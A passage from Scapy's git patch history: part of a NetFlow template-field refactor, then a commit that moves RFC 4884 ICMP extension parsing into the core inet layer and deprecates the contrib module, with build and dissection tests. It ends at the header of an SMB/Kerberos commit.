_N910F("GTPV2_C2S_S5_S8_SGW_GTPU_IP"), + 459 + NTOP_BASE: _N910F("GTPV2_S2C_S5_S8_SGW_GTPU_IP"), + 460 + NTOP_BASE: _N910F("HTTP_X_FORWARDED_FOR"), + 461 + NTOP_BASE: _N910F("HTTP_VIA"), + 462 + NTOP_BASE: _N910F("SSDP_HOST"), + 463 + NTOP_BASE: _N910F("SSDP_USN"), + 464 + NTOP_BASE: _N910F("NETBIOS_QUERY_NAME"), + 465 + NTOP_BASE: _N910F("NETBIOS_QUERY_TYPE"), + 466 + NTOP_BASE: _N910F("NETBIOS_RESPONSE"), + 467 + NTOP_BASE: _N910F("NETBIOS_QUERY_OS"), + 468 + NTOP_BASE: _N910F("SSDP_SERVER"), + 469 + NTOP_BASE: _N910F("SSDP_TYPE"), + 470 + NTOP_BASE: _N910F("SSDP_METHOD"), + 471 + NTOP_BASE: _N910F("NPROBE_IPV4_ADDRESS", length=4, + field=IPField), +} +NetflowV910TemplateFieldTypes = { + k: v.name for k, v in NetflowV910TemplateFields.items() +} + +ScopeFieldTypes = { + 1: "System", + 2: "Interface", + 3: "Line card", + 4: "Cache", + 5: "Template", } @@ -1318,10 +1294,10 @@ def __init__(self, *args, **kwargs): Packet.__init__(self, *args, **kwargs) if (self.fieldType is not None and self.fieldLength is None and - self.fieldType in NetflowV9TemplateFieldDefaultLengths): - self.fieldLength = NetflowV9TemplateFieldDefaultLengths[ + self.fieldType in NetflowV910TemplateFields): + self.fieldLength = NetflowV910TemplateFields[ self.fieldType - ] + ].length or None def default_payload_class(self, p): return conf.padding_layer @@ -1358,18 +1334,21 @@ def _GenNetflowRecordV9(cls, lengths_list): """ _fields_desc = [] for j, k in lengths_list: - _f_data = NetflowV9TemplateFieldDecoders.get(k, None) - _f_type, _f_args = ( - _f_data if isinstance(_f_data, tuple) else (_f_data, []) - ) + _f_type = None _f_kwargs = {} + if k in NetflowV910TemplateFields: + _f = NetflowV910TemplateFields[k] + _f_type = _f.field + _f_kwargs = _f.kwargs + if _f_type: if issubclass(_f_type, _AdjustableNetflowField): _f_kwargs["length"] = j + print(k, _f_kwargs) _fields_desc.append( _f_type( NetflowV910TemplateFieldTypes.get(k, "unknown_data"), - 0, *_f_args, **_f_kwargs + 0, **_f_kwargs ) ) else: From 0f4ded30ab848cb45e8ad222657bf39c68862b3b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 10 Apr 2024 11:30:06 +0200 Subject: [PATCH 1248/1632] Rewrite ICMP extensions (#4332) --- scapy/contrib/icmp_extensions.py | 209 +++------------------ scapy/contrib/mpls.py | 39 +++- scapy/fields.py | 2 + scapy/layers/inet.py | 307 ++++++++++++++++++++++++++++--- scapy/layers/inet6.py | 25 ++- scapy/utils.py | 2 +- test/contrib/icmp_extensions.uts | 8 - test/scapy/layers/inet.uts | 70 +++++++ 8 files changed, 433 insertions(+), 229 deletions(-) delete mode 100644 test/contrib/icmp_extensions.uts diff --git a/scapy/contrib/icmp_extensions.py b/scapy/contrib/icmp_extensions.py index 44cca2cca3c..393fa959341 100644 --- a/scapy/contrib/icmp_extensions.py +++ b/scapy/contrib/icmp_extensions.py @@ -2,186 +2,29 @@ # This file is part of Scapy # See https://scapy.net/ for more information -# scapy.contrib.description = ICMP Extensions -# scapy.contrib.status = loads - -import struct - -import scapy -from scapy.compat import chb -from scapy.packet import Packet, bind_layers -from scapy.fields import BitField, ByteField, ConditionalField, \ - FieldLenField, IPField, IntField, PacketListField, ShortField, \ - StrLenField -from scapy.layers.inet import IP, ICMP, checksum -from scapy.layers.inet6 import IP6Field -from scapy.error import warning -from scapy.contrib.mpls import MPLS -from scapy.config import conf - - -class ICMPExtensionObject(Packet): - name = 'ICMP Extension Object' - fields_desc = [ShortField('len', None), - ByteField('classnum', 0), - ByteField('classtype', 0)] - - def post_build(self, p, pay): - if self.len is None: - tmp_len = len(p) + len(pay) - p = struct.pack('!H', tmp_len) + p[2:] - return p + pay - - -class ICMPExtensionHeader(Packet): - name = 'ICMP Extension Header (RFC4884)' - fields_desc = [BitField('version', 2, 4), - BitField('reserved', 0, 12), - BitField('chksum', None, 16)] - - _min_ieo_len = len(ICMPExtensionObject()) - - def post_build(self, p, pay): - if self.chksum is None: - ck = checksum(p) - p = p[:2] + chb(ck >> 8) + chb(ck & 0xff) + p[4:] - return p + pay - - def guess_payload_class(self, payload): - if len(payload) < self._min_ieo_len: - return Packet.guess_payload_class(self, payload) - - # Look at fields of the generic ICMPExtensionObject to determine which - # bound extension type to use. - ieo = ICMPExtensionObject(payload) - if ieo.len < self._min_ieo_len: - return Packet.guess_payload_class(self, payload) - - for fval, cls in self.payload_guess: - if all(hasattr(ieo, k) and v == ieo.getfieldval(k) - for k, v in fval.items()): - return cls - return ICMPExtensionObject - - -def ICMPExtension_post_dissection(self, pkt): - # RFC4884 section 5.2 says if the ICMP packet length - # is >144 then ICMP extensions start at byte 137. - - lastlayer = pkt.lastlayer() - if not isinstance(lastlayer, conf.padding_layer): - return - - if IP in pkt: - if (ICMP in pkt and - pkt[ICMP].type in [3, 11, 12] and - pkt.len > 144): - bytes = pkt[ICMP].build()[136:] - else: - return - elif scapy.layers.inet6.IPv6 in pkt: - if ((scapy.layers.inet6.ICMPv6TimeExceeded in pkt or - scapy.layers.inet6.ICMPv6DestUnreach in pkt) and - pkt.plen > 144): - bytes = pkt[scapy.layers.inet6.ICMPv6TimeExceeded].build()[136:] - else: - return - else: - return - - # validate checksum - ieh = ICMPExtensionHeader(bytes) - if checksum(ieh.build()): - return # failed - - lastlayer.load = lastlayer.load[:-len(ieh)] - lastlayer.add_payload(ieh) - - -class ICMPExtensionMPLS(ICMPExtensionObject): - name = 'ICMP Extension Object - MPLS (RFC4950)' - - fields_desc = [ShortField('len', None), - ByteField('classnum', 1), - ByteField('classtype', 1), - PacketListField('stack', [], MPLS, - length_from=lambda pkt: pkt.len - 4)] - - -class ICMPExtensionInterfaceInformation(ICMPExtensionObject): - name = 'ICMP Extension Object - Interface Information Object (RFC5837)' - - fields_desc = [ShortField('len', None), - ByteField('classnum', 2), - BitField('interface_role', 0, 2), - BitField('reserved', 0, 2), - BitField('has_ifindex', 0, 1), - BitField('has_ipaddr', 0, 1), - BitField('has_ifname', 0, 1), - BitField('has_mtu', 0, 1), - - ConditionalField( - IntField('ifindex', None), - lambda pkt: pkt.has_ifindex == 1), - - ConditionalField( - ShortField('afi', None), - lambda pkt: pkt.has_ipaddr == 1), - ConditionalField( - ShortField('reserved2', 0), - lambda pkt: pkt.has_ipaddr == 1), - ConditionalField( - IPField('ip4', None), - lambda pkt: pkt.afi == 1), - ConditionalField( - IP6Field('ip6', None), - lambda pkt: pkt.afi == 2), - - ConditionalField( - FieldLenField('ifname_len', None, fmt='B', - length_of='ifname'), - lambda pkt: pkt.has_ifname == 1), - ConditionalField( - StrLenField('ifname', None, - length_from=lambda pkt: pkt.ifname_len), - lambda pkt: pkt.has_ifname == 1), - - ConditionalField( - IntField('mtu', None), - lambda pkt: pkt.has_mtu == 1)] - - def self_build(self, **kwargs): - if self.afi is None: - if self.ip4 is not None: - self.afi = 1 - elif self.ip6 is not None: - self.afi = 2 - - if self.has_ifindex and self.ifindex is None: - warning('has_ifindex set but ifindex is not set.') - if self.has_ipaddr and self.afi is None: - warning('has_ipaddr set but afi is not set.') - if self.has_ipaddr and self.ip4 is None and self.ip6 is None: - warning('has_ipaddr set but ip4 or ip6 is not set.') - if self.has_ifname and self.ifname is None: - warning('has_ifname set but ifname is not set.') - if self.has_mtu and self.mtu is None: - warning('has_mtu set but mtu is not set.') - - return ICMPExtensionObject.self_build(self, **kwargs) - - -# Add the post_dissection() method to the existing ICMPv4 and -# ICMPv6 error messages -scapy.layers.inet.ICMPerror.post_dissection = ICMPExtension_post_dissection -scapy.layers.inet.TCPerror.post_dissection = ICMPExtension_post_dissection -scapy.layers.inet.UDPerror.post_dissection = ICMPExtension_post_dissection - -scapy.layers.inet6.ICMPv6DestUnreach.post_dissection = ICMPExtension_post_dissection # noqa: E501 -scapy.layers.inet6.ICMPv6TimeExceeded.post_dissection = ICMPExtension_post_dissection # noqa: E501 - - -# ICMPExtensionHeader looks at fields from the upper layer object when -# determining which upper layer to use. -bind_layers(ICMPExtensionHeader, ICMPExtensionMPLS, classnum=1, classtype=1) -bind_layers(ICMPExtensionHeader, ICMPExtensionInterfaceInformation, classnum=2) +# scapy.contrib.description = ICMP Extensions (deprecated) +# scapy.contrib.status = deprecated + +__all__ = [ + "ICMPExtensionObject", + "ICMPExtensionHeader", + "ICMPExtensionInterfaceInformation", + "ICMPExtensionMPLS", +] + +import warnings + +from scapy.layers.inet import ( + ICMPExtension_Object as ICMPExtensionObject, + ICMPExtension_Header as ICMPExtensionHeader, + ICMPExtension_InterfaceInformation as ICMPExtensionInterfaceInformation, +) +from scapy.contrib.mpls import ( + ICMPExtension_MPLS as ICMPExtensionMPLS, +) + +warnings.warn( + "scapy.contrib.icmp_extensions is deprecated. Behavior has changed ! " + "Use scapy.layers.inet", + DeprecationWarning +) diff --git a/scapy/contrib/mpls.py b/scapy/contrib/mpls.py index 95620c31bf1..0808b8a70b0 100644 --- a/scapy/contrib/mpls.py +++ b/scapy/contrib/mpls.py @@ -6,12 +6,24 @@ # scapy.contrib.status = loads from scapy.packet import Packet, bind_layers, Padding -from scapy.fields import BitField, ByteField, ShortField -from scapy.layers.inet import IP, UDP -from scapy.contrib.bier import BIER +from scapy.fields import ( + BitField, + ByteField, + ByteEnumField, + PacketListField, + ShortField, +) + +from scapy.layers.inet import ( + _ICMP_classnums, + ICMPExtension_Object, + IP, + UDP, +) from scapy.layers.inet6 import IPv6 from scapy.layers.l2 import Ether, GRE -from scapy.compat import orb + +from scapy.contrib.bier import BIER class EoMCW(Packet): @@ -37,7 +49,7 @@ def guess_payload_class(self, payload): if len(payload) >= 1: if not self.s: return MPLS - ip_version = (orb(payload[0]) >> 4) & 0xF + ip_version = (payload[0] >> 4) & 0xF if ip_version == 4: return IP elif ip_version == 5: @@ -45,13 +57,28 @@ def guess_payload_class(self, payload): elif ip_version == 6: return IPv6 else: - if orb(payload[0]) == 0 and orb(payload[1]) == 0: + if payload[0] == 0 and payload[1] == 0: return EoMCW else: return Ether return Padding +# ICMP Extension + +class ICMPExtension_MPLS(ICMPExtension_Object): + name = "ICMP Extension Object - MPLS (RFC4950)" + + fields_desc = [ + ShortField("len", None), + ByteEnumField("classnum", 1, _ICMP_classnums), + ByteField("classtype", 1), + PacketListField("stack", [], MPLS, length_from=lambda pkt: pkt.len - 4), + ] + + +# Bindings + bind_layers(Ether, MPLS, type=0x8847) bind_layers(IP, MPLS, proto=137) bind_layers(IPv6, MPLS, nh=137) diff --git a/scapy/fields.py b/scapy/fields.py index e14beb27c9d..7f9da8e10b8 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1893,6 +1893,8 @@ def i2repr(self, def getfield(self, pkt, s): # type: (Packet, bytes) -> Tuple[bytes, bytes] len_pkt = self.length_from(pkt) + if len_pkt == 0: + return s, b"" return s[len_pkt:], self.m2i(pkt, s[:len_pkt]) def addfield(self, pkt, s, val): diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 802aa57c103..b100c78d473 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -45,9 +45,11 @@ FieldListField, FlagsField, IPField, + IP6Field, IntField, MultiEnumField, MultipleTypeField, + PacketField, PacketListField, ShortEnumField, ShortField, @@ -55,6 +57,7 @@ StrField, StrFixedLenField, StrLenField, + TrailerField, XByteField, XShortField, ) @@ -864,6 +867,185 @@ def mysummary(self): return self.sprintf("UDP %UDP.sport% > %UDP.dport%") +# RFC 4884 ICMP extensions +_ICMP_classnums = { + # https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml#icmp-parameters-ext-classes + 1: "MPLS", + 2: "Interface Information", + 3: "Interface Identification", + 4: "Extended Information", +} + + +class ICMPExtension_Object(Packet): + name = "ICMP Extension Object" + show_indent = 0 + fields_desc = [ + ShortField("len", None), + ByteEnumField("classnum", 0, _ICMP_classnums), + ByteField("classtype", 0), + ] + + def post_build(self, p, pay): + if self.len is None: + tmp_len = len(p) + len(pay) + p = struct.pack("!H", tmp_len) + p[2:] + return p + pay + + registered_icmp_exts = {} + + @classmethod + def register_variant(cls): + cls.registered_icmp_exts[cls.classnum.default] = cls + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 4: + classnum = _pkt[2] + if classnum in cls.registered_icmp_exts: + return cls.registered_icmp_exts[classnum] + return cls + + +class ICMPExtension_InterfaceInformation(ICMPExtension_Object): + name = "ICMP Extension Object - Interface Information Object (RFC5837)" + + fields_desc = [ + ShortField("len", None), + ByteEnumField("classnum", 2, _ICMP_classnums), + BitField("classtype", 0, 2), + BitField("reserved", 0, 2), + BitField("has_ifindex", 0, 1), + BitField("has_ipaddr", 0, 1), + BitField("has_ifname", 0, 1), + BitField("has_mtu", 0, 1), + ConditionalField(IntField("ifindex", None), lambda pkt: pkt.has_ifindex == 1), + ConditionalField(ShortField("afi", None), lambda pkt: pkt.has_ipaddr == 1), + ConditionalField(ShortField("reserved2", 0), lambda pkt: pkt.has_ipaddr == 1), + ConditionalField(IPField("ip4", None), lambda pkt: pkt.afi == 1), + ConditionalField(IP6Field("ip6", None), lambda pkt: pkt.afi == 2), + ConditionalField( + FieldLenField("ifname_len", None, fmt="B", length_of="ifname"), + lambda pkt: pkt.has_ifname == 1, + ), + ConditionalField( + StrLenField("ifname", None, length_from=lambda pkt: pkt.ifname_len), + lambda pkt: pkt.has_ifname == 1, + ), + ConditionalField(IntField("mtu", None), lambda pkt: pkt.has_mtu == 1), + ] + + def self_build(self, **kwargs): + if self.afi is None: + if self.ip4 is not None: + self.afi = 1 + elif self.ip6 is not None: + self.afi = 2 + return ICMPExtension_Object.self_build(self, **kwargs) + + +class ICMPExtension_Header(Packet): + r""" + ICMP Extension per RFC4884. + + Example:: + + pkt = IP(dst="127.0.0.1", src="127.0.0.1") / ICMP( + type="time-exceeded", + code="ttl-zero-during-transit", + ext=ICMPExtension_Header() / ICMPExtension_InterfaceInformation( + has_ifindex=1, + has_ipaddr=1, + has_ifname=1, + ip4="10.10.10.10", + ifname="hey", + ) + ) / IPerror(src="12.4.4.4", dst="12.1.1.1") / \ + UDPerror(sport=42315, dport=33440) / \ + b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + """ + + name = "ICMP Extension Header (RFC4884)" + show_indent = 0 + fields_desc = [ + BitField("version", 2, 4), + BitField("reserved", 0, 12), + XShortField("chksum", None), + ] + + _min_ieo_len = len(ICMPExtension_Object()) + + def post_build(self, p, pay): + p += pay + if self.chksum is None: + ck = checksum(p) + p = p[:2] + chb(ck >> 8) + chb(ck & 0xFF) + p[4:] + return p + + def guess_payload_class(self, payload): + if len(payload) < self._min_ieo_len: + return Packet.guess_payload_class(self, payload) + return ICMPExtension_Object + + +class _ICMPExtensionField(TrailerField): + # We use a TrailerField for building only. Dissection is normal. + + def __init__(self): + super(_ICMPExtensionField, self).__init__( + PacketField( + "ext", + None, + ICMPExtension_Header, + ), + ) + + def getfield(self, pkt, s): + # RFC4884 section 5.2 says if the ICMP packet length + # is >144 then ICMP extensions start at byte 137. + if len(pkt.original) < 144: + return s, None + offset = 136 + len(s) - len(pkt.original) + data = s[offset:] + # Validate checksum + if checksum(data) == data[3:5]: + return s, None # failed + # Dissect + return s[:offset], ICMPExtension_Header(data) + + def addfield(self, pkt, s, val): + if val is None: + return s + data = bytes(val) + # Calc how much padding we need, not how much we deserve + pad = 136 - len(pkt.payload) - len(s) + if pad < 0: + warning("ICMPExtension_Header is after the 136th octet of ICMP.") + return data + return super(_ICMPExtensionField, self).addfield(pkt, s, b"\x00" * pad + data) + + +class _ICMPExtensionPadField(TrailerField): + def __init__(self): + super(_ICMPExtensionPadField, self).__init__( + StrFixedLenField("extpad", "", length=0) + ) + + def i2repr(self, pkt, s): + if s and s == b"\x00" * len(s): + return "b'' (%s octets)" % len(s) + return self.fld.i2repr(pkt, s) + + +def _ICMP_extpad_post_dissection(self, pkt): + # If we have padding, put it in 'extpad' for re-build + if pkt.ext: + pad = pkt.lastlayer() + if isinstance(pad, conf.padding_layer): + pad.underlayer.remove_payload() + pkt.extpad = pad.load + + icmptypes = {0: "echo-reply", 3: "dest-unreach", 4: "source-quench", @@ -923,35 +1105,99 @@ def mysummary(self): 5: "need-authorization", }, } +_icmp_answers = [ + (8, 0), + (13, 14), + (15, 16), + (17, 18), + (33, 34), + (35, 36), + (37, 38), +] + icmp_id_seq_types = [0, 8, 13, 14, 15, 16, 17, 18, 37, 38] class ICMP(Packet): name = "ICMP" - fields_desc = [ByteEnumField("type", 8, icmptypes), - MultiEnumField("code", 0, icmpcodes, depends_on=lambda pkt:pkt.type, fmt="B"), # noqa: E501 - XShortField("chksum", None), - ConditionalField(XShortField("id", 0), lambda pkt:pkt.type in icmp_id_seq_types), # noqa: E501 - ConditionalField(XShortField("seq", 0), lambda pkt:pkt.type in icmp_id_seq_types), # noqa: E501 - ConditionalField(ICMPTimeStampField("ts_ori", None), lambda pkt:pkt.type in [13, 14]), # noqa: E501 - ConditionalField(ICMPTimeStampField("ts_rx", None), lambda pkt:pkt.type in [13, 14]), # noqa: E501 - ConditionalField(ICMPTimeStampField("ts_tx", None), lambda pkt:pkt.type in [13, 14]), # noqa: E501 - ConditionalField(IPField("gw", "0.0.0.0"), lambda pkt:pkt.type == 5), # noqa: E501 - ConditionalField(ByteField("ptr", 0), lambda pkt:pkt.type == 12), # noqa: E501 - ConditionalField(ByteField("reserved", 0), lambda pkt:pkt.type in [3, 11]), # noqa: E501 - ConditionalField(ByteField("length", 0), lambda pkt:pkt.type in [3, 11, 12]), # noqa: E501 - ConditionalField(IPField("addr_mask", "0.0.0.0"), lambda pkt:pkt.type in [17, 18]), # noqa: E501 - ConditionalField(ShortField("nexthopmtu", 0), lambda pkt:pkt.type == 3), # noqa: E501 - MultipleTypeField( - [ - (ShortField("unused", 0), - lambda pkt:pkt.type in [11, 12]), - (IntField("unused", 0), - lambda pkt:pkt.type not in [0, 3, 5, 8, 11, 12, - 13, 14, 15, 16, 17, - 18]) - ], StrFixedLenField("unused", "", length=0)), - ] + fields_desc = [ + ByteEnumField("type", 8, icmptypes), + MultiEnumField("code", 0, icmpcodes, + depends_on=lambda pkt:pkt.type, fmt="B"), + XShortField("chksum", None), + ConditionalField( + XShortField("id", 0), + lambda pkt: pkt.type in icmp_id_seq_types + ), + ConditionalField( + XShortField("seq", 0), + lambda pkt: pkt.type in icmp_id_seq_types + ), + ConditionalField( + # Timestamp only (RFC792) + ICMPTimeStampField("ts_ori", None), + lambda pkt: pkt.type in [13, 14] + ), + ConditionalField( + # Timestamp only (RFC792) + ICMPTimeStampField("ts_rx", None), + lambda pkt: pkt.type in [13, 14] + ), + ConditionalField( + # Timestamp only (RFC792) + ICMPTimeStampField("ts_tx", None), + lambda pkt: pkt.type in [13, 14] + ), + ConditionalField( + # Redirect only (RFC792) + IPField("gw", "0.0.0.0"), + lambda pkt: pkt.type == 5 + ), + ConditionalField( + # Parameter problem only (RFC792) + ByteField("ptr", 0), + lambda pkt: pkt.type == 12 + ), + ConditionalField( + ByteField("reserved", 0), + lambda pkt: pkt.type in [3, 11] + ), + ConditionalField( + ByteField("length", 0), + lambda pkt: pkt.type in [3, 11, 12] + ), + ConditionalField( + IPField("addr_mask", "0.0.0.0"), + lambda pkt: pkt.type in [17, 18] + ), + ConditionalField( + ShortField("nexthopmtu", 0), + lambda pkt: pkt.type == 3 + ), + MultipleTypeField( + [ + (ShortField("unused", 0), + lambda pkt:pkt.type in [11, 12]), + (IntField("unused", 0), + lambda pkt:pkt.type not in [0, 3, 5, 8, 11, 12, + 13, 14, 15, 16, 17, + 18]) + ], + StrFixedLenField("unused", "", length=0), + ), + # RFC4884 ICMP extension + ConditionalField( + _ICMPExtensionPadField(), + lambda pkt: pkt.type in [3, 11, 12], + ), + ConditionalField( + _ICMPExtensionField(), + lambda pkt: pkt.type in [3, 11, 12], + ), + ] + + # To handle extpad + post_dissection = _ICMP_extpad_post_dissection def post_build(self, p, pay): p += pay @@ -968,7 +1214,7 @@ def hashret(self): def answers(self, other): if not isinstance(other, ICMP): return 0 - if ((other.type, self.type) in [(8, 0), (13, 14), (15, 16), (17, 18), (33, 34), (35, 36), (37, 38)] and # noqa: E501 + if ((other.type, self.type) in _icmp_answers and self.id == other.id and self.seq == other.seq): return 1 @@ -981,11 +1227,18 @@ def guess_payload_class(self, payload): return None def mysummary(self): + extra = "" + if self.ext: + extra = self.ext.payload.sprintf(" ext:%classnum%") if isinstance(self.underlayer, IP): - return self.underlayer.sprintf("ICMP %IP.src% > %IP.dst% %ICMP.type% %ICMP.code%") # noqa: E501 + return self.underlayer.sprintf( + "ICMP %IP.src% > %IP.dst% %ICMP.type% %ICMP.code%" + ) + extra else: - return self.sprintf("ICMP %ICMP.type% %ICMP.code%") + return self.sprintf("ICMP %ICMP.type% %ICMP.code%") + extra + +# IP / TCP / UDP error packets class IPerror(IP): name = "IP in ICMP" diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 7a26613d563..4602b324505 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -61,8 +61,18 @@ XIntField, XShortField, ) -from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ - UDP, UDPerror +from scapy.layers.inet import ( + _ICMPExtensionField, + _ICMPExtensionPadField, + _ICMP_extpad_post_dissection, + IP, + IPTools, + TCP, + TCPerror, + TracerouteResult, + UDP, + UDPerror, +) from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP from scapy.packet import bind_layers, Packet, Raw from scapy.sendrecv import sendp, sniff, sr, srp1 @@ -1438,7 +1448,10 @@ class ICMPv6DestUnreach(_ICMPv6Error): 4: "Port unreachable"}), XShortField("cksum", None), ByteField("length", 0), - X3BytesField("unused", 0)] + X3BytesField("unused", 0), + _ICMPExtensionPadField(), + _ICMPExtensionField()] + post_dissection = _ICMP_extpad_post_dissection class ICMPv6PacketTooBig(_ICMPv6Error): @@ -1456,7 +1469,11 @@ class ICMPv6TimeExceeded(_ICMPv6Error): 1: "fragment reassembly time exceeded"}), # noqa: E501 XShortField("cksum", None), ByteField("length", 0), - X3BytesField("unused", 0)] + X3BytesField("unused", 0), + _ICMPExtensionPadField(), + _ICMPExtensionField()] + post_dissection = _ICMP_extpad_post_dissection + # The default pointer value is set to the next header field of # the encapsulated IPv6 packet diff --git a/scapy/utils.py b/scapy/utils.py index f5149c73e99..85e7a423dcc 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -613,7 +613,7 @@ def _fletcher16(charbuf): # This is based on the GPLed C implementation in Zebra # noqa: E501 c0 = c1 = 0 for char in charbuf: - c0 += orb(char) + c0 += char c1 += c0 c0 %= 255 diff --git a/test/contrib/icmp_extensions.uts b/test/contrib/icmp_extensions.uts deleted file mode 100644 index 13bdaf4482f..00000000000 --- a/test/contrib/icmp_extensions.uts +++ /dev/null @@ -1,8 +0,0 @@ -+ ICMP Extensions tests - -= Basic build - -p = IP(src="192.0.2.1", dst="192.0.2.2")/ICMP()/ICMPExtensionHeader(version = 2)/ICMPExtensionMPLS(classnum = 1, classtype = 1) -print(raw(p)) -b = b'E\x00\x00$\x00\x01\x00\x00@\x01\xf6\xd4\xc0\x00\x02\x01\xc0\x00\x02\x02\x08\x00\xf6\xfa\x00\x00\x00\x00 \x00\xdf\xff\x00\x04\x01\x01' -assert raw(p) == b diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index 12f096dc77a..55370f1c708 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -826,3 +826,73 @@ sr = Ether(src="de:ad:be:ef:aa:55", dst="ca:fe:00:00:00:00")/IP(src="20.0.0.1",d TCP() bytes(sr[UDP]) assert sr[IP:2].dst == "100.0.0.1" + + +############### +############### ++ ICMPv4 extensions + += Build ICMP extension from scratch + +pkt = IP(dst="127.0.0.1", src="127.0.0.1") / ICMP( + type="time-exceeded", + code="ttl-zero-during-transit", + ext=ICMPExtension_Header() / ICMPExtension_InterfaceInformation( + has_ifindex=1, + has_ipaddr=1, + has_ifname=1, + ip4="10.10.10.10", + ifname="hey", + ) +) / IPerror(src="12.4.4.4", dst="12.1.1.1") / \ + UDPerror(sport=42315, dport=33440) / \ + b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + +assert bytes(pkt) == b'E\x00\x00\xb0\x00\x01\x00\x00@\x01|J\x7f\x00\x00\x01\x7f\x00\x00\x01\x0b\x00\x12/\x00\x00\x00\x00E\x00\x00(\x00\x01\x00\x00@\x11]\xbb\x0c\x04\x04\x04\x0c\x01\x01\x01\xa5K\x82\xa0\x00\x14\xba\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00u\x00\x00\x10\x02\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x03hey' + += Check dissection and rebuild of MPLS ICMPv4 extension + +# GH4281 + +load_contrib("mpls") +pkt = Ether(b'\x00\x15]\x94AY\x00\x15]\x07\xcb\x04\x08\x00E\x00\x00\xb0?2\x00\x00\xe6\x01\x1b\xabh,\x1f\x1d\xac\x1cF\n\x0b\x00Ll\x00\x11\x00\x00E \x00<\x96\xdf\x00\x00\x02\x11\xa7\xc6\xac\x1cF\n(Q_t\xb8-\x82\xb3\x00(xt@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x02\xff\x00\x10\x01\x01\tp2\x01\x05\xde\xd2\x01\x05\x9c\xc3\x02') + +assert isinstance(pkt[ICMP].ext, ICMPExtension_Header) +assert ICMPExtension_MPLS in pkt[ICMP].ext +assert all(isinstance(x, MPLS) for x in pkt[ICMP].ext.stack) +assert [x.label for x in pkt[ICMP].ext.stack[0].iterpayloads()] == [38659, 24045, 22988] + +# Build +pkt.clear_cache() +pkt.ext.chksum = None # Check that chksum rebuilds +pkt[IP].chksum = None +assert bytes(pkt) == b'\x00\x15]\x94AY\x00\x15]\x07\xcb\x04\x08\x00E\x00\x00\xb0?2\x00\x00\xe6\x01\x1b\xabh,\x1f\x1d\xac\x1cF\n\x0b\x00Ll\x00\x11\x00\x00E \x00<\x96\xdf\x00\x00\x02\x11\xa7\xc6\xac\x1cF\n(Q_t\xb8-\x82\xb3\x00(xt@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x02\xff\x00\x10\x01\x01\tp2\x01\x05\xde\xd2\x01\x05\x9c\xc3\x02' + += ICMPv4 extension - Other dissection example + +# GH1773 + +load_contrib("mpls") +pkt = Ether(b'\x00\x1cs\x03\x12\x06t\x83\xef\x00\n\xd5\x08\x00E\x00\x00\xa8H\x1e\x00\x00\xfb\x01\xf0\xe3\xc0\xa8\x02\x01\xc0\xa8\x03\x01\x0b\x00rr\x00 \x00\x00E\x00\x00 Date: Wed, 10 Apr 2024 13:53:39 +0200 Subject: [PATCH 1249/1632] SMB + Kerberos improvements (#4344) * Refactor SMB client and server around a common SMBSession * Test smbserver 2.0.2 * Begin support of smbclient 3.1.1 * Minor smbclient improvements * Support Kerberos GSS_WrapEx other kerberos improvements --- doc/scapy/layers/dcerpc.rst | 2 +- scapy/automaton.py | 12 +- scapy/config.py | 4 +- scapy/layers/dcerpc.py | 4 +- scapy/layers/dhcp.py | 12 +- scapy/layers/kerberos.py | 249 ++++++++++++++--- scapy/layers/ldap.py | 4 +- scapy/layers/msrpce/rpcclient.py | 19 +- scapy/layers/msrpce/rpcserver.py | 13 +- scapy/layers/smb2.py | 377 +++++++++++++++++++------- scapy/layers/smbclient.py | 355 +++++++++++++++++++----- scapy/layers/smbserver.py | 218 ++++----------- scapy/libs/rfc3961.py | 132 ++++++--- scapy/modules/ticketer.py | 27 +- scapy/supersocket.py | 1 + test/scapy/layers/dcerpc.uts | 71 ++++- test/scapy/layers/dhcp.uts | 2 +- test/scapy/layers/kerberos.uts | 161 ++++++++++- test/scapy/layers/smbclientserver.uts | 26 +- 19 files changed, 1242 insertions(+), 447 deletions(-) diff --git a/doc/scapy/layers/dcerpc.rst b/doc/scapy/layers/dcerpc.rst index 